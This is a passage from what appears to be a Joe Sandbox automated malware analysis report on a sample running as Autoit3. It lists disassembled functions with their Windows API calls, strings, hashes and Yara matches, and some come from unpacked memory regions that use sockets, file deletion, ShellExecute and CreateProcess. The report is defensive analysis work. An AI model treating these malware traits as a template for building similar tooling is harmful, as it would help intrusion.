Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 52304e5f1c1161aecfb84707bb9130c3c5095c14eb305c12d38c01a23e0fac11
Instruction ID: 20eead5568aadc2bd6b051fd1f52550750b06450e39310d283a6e36b14fe8b34
Opcode Fuzzy Hash: 52304e5f1c1161aecfb84707bb9130c3c5095c14eb305c12d38c01a23e0fac11
Instruction Fuzzy Hash: 79118B72502249BFDB024FA49C45FEFBB69FF58394F550112FA1456110C731DD60ABA0

Function 00CCE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CCE1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00CCE201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00CCE216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00CCE234

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 537cae84a1aa684416f730a648cc351f00da5618fd5e1bcdef39fb80208f734a
Instruction ID: 906c86feefaac9ce14cdcc7a1df46c78b6157ed895ab36a2be2bbdaccc1fd137
Opcode Fuzzy Hash: 537cae84a1aa684416f730a648cc351f00da5618fd5e1bcdef39fb80208f734a
Instruction Fuzzy Hash: BA116DB52063049BE3308F55ED0CF97BBBCEB01B00F10895EE66AD6451D7B0E948EBA1

Function 046F8A90 Relevance: 6.0, APIs: 4, Instructions: 43timefileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 046F8AA1
GetLastError.KERNEL32(?,?), ref: 046F8AAA
FileTimeToLocalFileTime.KERNEL32(?), ref: 046F8AC0
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 046F8ACF

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: 091833e8f60d4b9810db7f71bfbd521d3f71a1107c8f483edfd609cf213acc47
Instruction ID: bc8107ebe70f51dd050cc0abce06496a87d66efe84ee12763cadf44212cafaea
Opcode Fuzzy Hash: 091833e8f60d4b9810db7f71bfbd521d3f71a1107c8f483edfd609cf213acc47
Instruction Fuzzy Hash: BD01FBB6604215AF9B04EEA8CDC188773ECEF1825470445AAEE95CF249F620F95587B4

Function 00CCC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00C416CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C41729
Part of subcall function 00C416CF: SelectObject.GDI32(?,00000000), ref: 00C41738
Part of subcall function 00C416CF: BeginPath.GDI32(?), ref: 00C4174F
Part of subcall function 00C416CF: SelectObject.GDI32(?,00000000), ref: 00C41778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCC3E8
LineTo.GDI32(00000000,?,?), ref: 00CCC3F5
EndPath.GDI32(00000000), ref: 00CCC405
StrokePath.GDI32(00000000), ref: 00CCC413

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: eeaf290c5e32e5d70082de859a89f6868a3b3be3dabdc369a6be1b71063931dc
Instruction ID: 632d71840e02fde3de393cc64cf696ab3dc28aa8629c4b652aaf1362954eeea9
Opcode Fuzzy Hash: eeaf290c5e32e5d70082de859a89f6868a3b3be3dabdc369a6be1b71063931dc
Instruction Fuzzy Hash: 25F0E232006219BBDB136F58AC0DFDE3F59BF05310F188005FA55A51E183746650EFB9

Function 00C9AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9AA82
GetCurrentThreadId.KERNEL32 ref: 00C9AA89
AttachThreadInput.USER32(00000000), ref: 00C9AA90

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 4b109ec90defb2240ebd7c12beb7fe42f8389d0ee0c02bcfc2ffd43bfe478dd9
Instruction ID: f35ce8e38781e4f1258d3fdb4955a4a696a959ed944e920f20583038e41dd889
Opcode Fuzzy Hash: 4b109ec90defb2240ebd7c12beb7fe42f8389d0ee0c02bcfc2ffd43bfe478dd9
Instruction Fuzzy Hash: B7E03931542228BBDB215FA69D0CFEF7F1CEF527A1F508012F90984050CA71C651DBE0

Function 0472F48C Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0472F490
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0472F49A
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0472F4A4
ReleaseDC.USER32(00000000,00000000), ref: 0472F4C4

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 48889af1cc29d6e8633ccb3ea8eb9418066094a3bc8d365a5c7df92cf67b10bf
Instruction ID: 5af566b98928c8f903aaf009796ef80df9389f650c7c944493fc4860a95293f9
Opcode Fuzzy Hash: 48889af1cc29d6e8633ccb3ea8eb9418066094a3bc8d365a5c7df92cf67b10bf
Instruction Fuzzy Hash: D4E0C2526483B838F3203278CC85FAA0A4CCB01759F4004E7EB886E2C2E2C82C4103B5

Function 00C425F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C4260D
SetTextColor.GDI32(?,000000FF), ref: 00C42617
SetBkMode.GDI32(?,00000001), ref: 00C4262C
GetStockObject.GDI32(00000005), ref: 00C42634
GetWindowDC.USER32(?,00000000), ref: 00C7C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C7C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00C7C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00C7C203
GetPixel.GDI32(00000000,?,?), ref: 00C7C223
ReleaseDC.USER32(?,00000000), ref: 00C7C22E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 64f556b38ee57cca19b59bdc15b2bcf6da700dbf02594cd697e76e723ad64e1a
Instruction ID: c7ea0a2d26a52f301d556b01cb261231814e4fcf77cba35f1c8e7e1897b0652b
Opcode Fuzzy Hash: 64f556b38ee57cca19b59bdc15b2bcf6da700dbf02594cd697e76e723ad64e1a
Instruction Fuzzy Hash: D1E06D31505244BBDB215FB8BC49BDC3B21EB05332F2483ABFA79480E287714A80DB12

Function 00C80679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C80679
GetDC.USER32(00000000), ref: 00C80683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C806A3
ReleaseDC.USER32(?), ref: 00C806C4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3b0d5d52ffe2a8a5ed5842dfb354d915ec1d0a98fe6f29bbf1255022a7707e48
Instruction ID: 32bd57ecdd7aa0bc16914c184ba7cb4ed66b7dbdf340d12cdc4d5e03c068d3d3
Opcode Fuzzy Hash: 3b0d5d52ffe2a8a5ed5842dfb354d915ec1d0a98fe6f29bbf1255022a7707e48
Instruction Fuzzy Hash: B0E0EEB1801204EFCB419FB9D808BAE7BB1FB88310F21800AFC5AA7210DB3895529F50

Function 00C8068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C8068D
GetDC.USER32(00000000), ref: 00C80697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C806A3
ReleaseDC.USER32(?), ref: 00C806C4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a6457279684c549c49f138319e4b4d5b139d5e4730d40a44a524598fe1e2a8a0
Instruction ID: 99ff6fc0688fdc511caa376178df7eef45a1830491f78da42d136d57fc1f57be
Opcode Fuzzy Hash: a6457279684c549c49f138319e4b4d5b139d5e4730d40a44a524598fe1e2a8a0
Instruction Fuzzy Hash: 17E012B1801204AFCB019FB8D808B9E7FF1FB8C310F20800AFD5AA7210CB3895529F50

Function 046F6EC8 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 046F6ECB
GlobalUnlock.KERNEL32(00000000), ref: 046F6ED2
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 046F6ED7
GlobalLock.KERNEL32(00000000), ref: 046F6EDD

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Global$AllocHandleLockUnlock
String ID:
API String ID: 2167344118-0
Opcode ID: ad7ccee025eab92ec84f06669fb48f7782a408bf1efbd639dd5b1252a33fc849
Instruction ID: 2c602efe50f28a7f50744bb7c18058c0c9f2086088cdaf4ac178ce6a39698cfa
Opcode Fuzzy Hash: ad7ccee025eab92ec84f06669fb48f7782a408bf1efbd639dd5b1252a33fc849
Instruction Fuzzy Hash: FBB009D58942423AB80433F0CD1AD3B001CE8A054A3819A5DB681E2804FC68F822003D

Function 00C4E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00C4E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00C4E037

Strings

@, xrefs: 00C4E02B

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 75f7607cde3c54574bf8bbd4e061ed4f4da09ff1f58bcac573348743cd056cd3
Instruction ID: 9b990dae5d277fb76152a24011a2f1faf4c328535620138411ece7392e3ac382
Opcode Fuzzy Hash: 75f7607cde3c54574bf8bbd4e061ed4f4da09ff1f58bcac573348743cd056cd3
Instruction Fuzzy Hash: 94515B724087449BE320AF50EC86BAFBBF8FF84714F61885DF2D8411A1DB709529DB26

Function 0474B068 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,?,?,00000005,00000000,00000000), ref: 0474B186

Part of subcall function 046F49E0: SysFreeString.OLEAUT32 ref: 046F49EE

Part of subcall function 046F49F8: SysFreeString.OLEAUT32 ref: 046F4A0B

Strings

.rar, xrefs: 0474B0A5
||-_-|-_-||, xrefs: 0474B0F9, 0474B10D

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FreeString$DeleteFile
String ID: .rar$||-_-|-_-||
API String ID: 51754653-3497882860
Opcode ID: 8c2c055f8a157ae9981fcd05ae2aa92fa390b1d0d5fa830a66fc1337c3cd91b0
Instruction ID: 15841d75b76858935f90a74abd62751b2d07ad6d7c087fcb672eaa5a71d1df10
Opcode Fuzzy Hash: 8c2c055f8a157ae9981fcd05ae2aa92fa390b1d0d5fa830a66fc1337c3cd91b0
Instruction Fuzzy Hash: DB411B71A0011E9BDB00EFA4DD84AEEB7B9FF89204F504065E515A7764EB70FD09CB64

Function 00CC8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00CC8186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC819B

Strings

', xrefs: 00CC80EF

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b2f951453ad3b709e4dc8eb08196854e0c26312cda3b99349067785a473fff8b
Instruction ID: 29287b54da8fe0ce96679b26cd9ca43057e1d328707f79b09514f017a01fb5a6
Opcode Fuzzy Hash: b2f951453ad3b709e4dc8eb08196854e0c26312cda3b99349067785a473fff8b
Instruction Fuzzy Hash: D741F774A012099FDB14CF65C881BDA7BF5FB09340F14416AE918AB391DB31A956CFA0

Function 00CB40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00CB4132

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00CB4124
, $, xrefs: 00CB4172

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 3a39716e58b3f0f7945deae3c4b3c9105956cbd007bd35c4407640995ffcac7c
Instruction ID: f134c71f61d4975f9667a6c091aa8bbae6cff41651a1c938d76b6d021473a85c
Opcode Fuzzy Hash: 3a39716e58b3f0f7945deae3c4b3c9105956cbd007bd35c4407640995ffcac7c
Instruction Fuzzy Hash: B621B474A0021C6FCF14EF64C885BED77B4AF54341F040454FD05A7182DB30AA85EBA2

Function 046FA380 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,046FA45E), ref: 046FA406
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,046FA45E), ref: 046FA40C

Strings

yyyy, xrefs: 046FA3E1

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: dec8248f20f09e4629e3b34819fa8c7cb2412a61977d8dbfd8bc2c4d5aea11a0
Instruction ID: fd2b6594c54452ebd1a2127a4dcfba0cd6f1d9867149c13259cff8ae9294622f
Opcode Fuzzy Hash: dec8248f20f09e4629e3b34819fa8c7cb2412a61977d8dbfd8bc2c4d5aea11a0
Instruction Fuzzy Hash: 1D2174356002089FEB01EF98CD459AEB3B9EF58704F504069EA88D7B50FA70FE00C765

Function 01799D3D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(017A2B4D), ref: 01799D81
RtlLeaveCriticalSection.NTDLL(017A2B4D), ref: 01799DF0

Part of subcall function 01798F59: RtlInitializeCriticalSection.NTDLL(017A2B4D), ref: 01798F70
Part of subcall function 01798F59: RtlEnterCriticalSection.NTDLL(017A2B4D), ref: 01798F83
Part of subcall function 01798F59: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,01799021), ref: 01798FAD
Part of subcall function 01798F59: RtlLeaveCriticalSection.NTDLL(017A2B4D), ref: 0179901B

Strings

N, xrefs: 01799D68

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: N
API String ID: 2227675388-4101671594
Opcode ID: 03d8fc2dade235454e2f30f83adf351c1ebe8116ec4fbf6ee29dd6d0a7309847
Instruction ID: bb82cef389f3cbd05bf9a301464907bd0c9b4049135d34ee572043ac45612cf1
Opcode Fuzzy Hash: 03d8fc2dade235454e2f30f83adf351c1ebe8116ec4fbf6ee29dd6d0a7309847
Instruction Fuzzy Hash: 53110670A04609AFFF21EE7CB8D566CFBD4D745628F5045BDE20493689EA309988C350

Function 00CB28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CB28F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CB2921

Strings

<local>, xrefs: 00CB28E9

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4f604a55fd2a07c764857519adb5a5875445ea953ab570717139c6fcc628810f
Instruction ID: f048887d2f5bd159b3fe04ae528a834bf38dd6591754c0a3ee4ccc88db0527d3
Opcode Fuzzy Hash: 4f604a55fd2a07c764857519adb5a5875445ea953ab570717139c6fcc628810f
Instruction Fuzzy Hash: 30110271901225BAEB258F52CC88FFBFBACFF05760F10852AF51946080E3716990DAF0

Function 00CB8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CB849D,?,00000000,?,?), ref: 00CB86F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB84A0
htons.WSOCK32(00000000,?,00000000), ref: 00CB84DD

Strings

255.255.255.255, xrefs: 00CB84B8

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 1ae4d0b9fda165c8624dfc657577e1f201618c6e7061b37d209a07fec483c73a
Instruction ID: 6747f18706e5144d83e03926bc7f27b84f393d2af85a83cab353776c1cf77235
Opcode Fuzzy Hash: 1ae4d0b9fda165c8624dfc657577e1f201618c6e7061b37d209a07fec483c73a
Instruction Fuzzy Hash: A211A57560020AABDF14AF64CC56FEEB368FF04310F208516F925572D1DB71A918DB95

Function 0472DCCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,00000048), ref: 0472DCF5

Strings

H, xrefs: 0472DCE6
%s|%d|%d|%d|%d, xrefs: 0472DD3C

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoMonitor
String ID: %s|%d|%d|%d|%d$H
API String ID: 2631571227-390123144
Opcode ID: 760fd795299950b0abf006cae7b47b021feb666c1149c95b87d827a7582864bf
Instruction ID: a036ba330a609adca9a61e6e9c0fd7b2456e7f4a89337d7059f3f31418ec7d3e
Opcode Fuzzy Hash: 760fd795299950b0abf006cae7b47b021feb666c1149c95b87d827a7582864bf
Instruction Fuzzy Hash: FF21D3B4D046888FEB11CFA8C944BCEBBF8AB09304F50456AE914EB391E775A905CF55

Function 0470C61C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,4004667F), ref: 0470C635

Part of subcall function 0470C608: closesocket.WS2_32(?), ref: 0470C60F

WSAGetLastError.WS2_32(?,?,00000400,00000000,00000400,?,?,00000000,0470C6C8,?,?,?,04717A16,00000000,04717A31), ref: 0470C670

Strings

3', xrefs: 0470C678

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocketioctlsocket
String ID: 3'
API String ID: 1604332089-280543908
Opcode ID: f0fcea1d56ef56ebffe88f85a45c76184f9af7e9734fd0ceec579d52c5ed73a1
Instruction ID: 715886fcda7c38b59ca903341e2006128f217015f7175d4fea4538f5b34e8113
Opcode Fuzzy Hash: f0fcea1d56ef56ebffe88f85a45c76184f9af7e9734fd0ceec579d52c5ed73a1
Instruction Fuzzy Hash: 8B014F7160A210DEE7397EB99C8C96A7AD49B49234F12AB2CE1E1D73C0D234A8458762

Function 0472342C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,OPEN,00000000,047234CC,047234CC), ref: 0472348E

Part of subcall function 0472387C: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,04723A50), ref: 04723962
